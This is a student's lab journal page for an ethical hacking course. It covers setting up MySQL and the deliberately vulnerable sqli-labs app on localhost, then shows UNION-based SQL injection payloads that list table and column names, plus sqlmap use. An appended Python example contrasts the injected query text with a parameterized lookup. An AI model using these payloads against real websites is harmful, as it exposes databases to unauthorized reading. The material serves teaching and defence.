Lab 9.1 SQLi Review - JimKnee-Champ/Ethical-Hacking-Journal GitHub Wiki
sudo systemctl enable mysqld
sudo systemctl restart mysqld
sudo mysql_secure_installation
Switch to unix_socket authentication [Y/n] n
Change the root password? [Y/n] Y
Remove anonymous users? [Y/n] y
Disallow root login remotely? [Y/n] y
Remove test database and access to it? [Y/n] y
Reload privilege tables now? [Y/n] y
mkdir -p ~/sec335/week9
cd ~/sec335/week9
git clone https://github.com/skyblueee/sqli-labs-php7.git
cd sqli-labs-php7
nano sql-connections/db-creds.inc
php -S 127.0.0.1:8090 -t . - this worked when I ran it within the "sqli-labs-php7" directory. Runs the server for the SQLi labs so you can access them via a browser.
cd Less-1
nano index.php
Add the following line beneath the $sql statement (the select * from users where id='$id' limit 0,1 query), directly underneath the $row line:
printf("raw_sql: %s",$sql);
To get the SQL server to have the proper databases for testing, you'll need to click the "setup/reset databases for labs" link on the main page.
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() --+
sqlmap --wizard - launches sqlmap with command-line prompts for options from the user. You need to specify the URL, difficulty, and verbosity.
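What the raw_sql debug line reveals for the first union payload above, next to the parameterized lookup that removes the flaw. This is an added example, not code from the wiki or from sqli-labs. It assumes Less-1 interpolates id inside single quotes, uses an in-memory SQLite table as a constructed stand-in for the lab's MySQL users table, and all function names are hypothetical.

```python
import sqlite3
from urllib.parse import parse_qs

# Query string copied from the page (first union payload), without the leading "?".
PAGE_QUERY = ("id=-1' union select 1,group_concat(table_name),3 "
              "from information_schema.tables where table_schema=database() --+")


def decode_id(query_string):
    """URL-decode the id parameter as the web server does ('+' becomes a space)."""
    return parse_qs(query_string)["id"][0]


def raw_sql(user_id):
    """Build the statement by string interpolation (assumed Less-1 shape).

    The result is the text the page's printf("raw_sql: ...") line would display.
    It is only rendered here, never executed.
    """
    return "SELECT * FROM users WHERE id='%s' LIMIT 0,1" % user_id


def lookup_safe(conn, user_id):
    """Hardened lookup: the input is bound as a value and never parsed as SQL."""
    return conn.execute(
        "SELECT * FROM users WHERE id = ? LIMIT 1", (user_id,)
    ).fetchone()


def make_db():
    """Constructed sample data standing in for the lab's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'constructed_user', 'constructed_pw')")
    return conn


if __name__ == "__main__":
    conn = make_db()
    payload = decode_id(PAGE_QUERY)
    # The quote in the payload closes the string literal; "-- " comments out the tail.
    print("raw_sql:", raw_sql(payload))
    # Bound as data, the same input matches no id and returns nothing.
    print("bound  :", lookup_safe(conn, payload))
    print("normal :", lookup_safe(conn, "1"))
```
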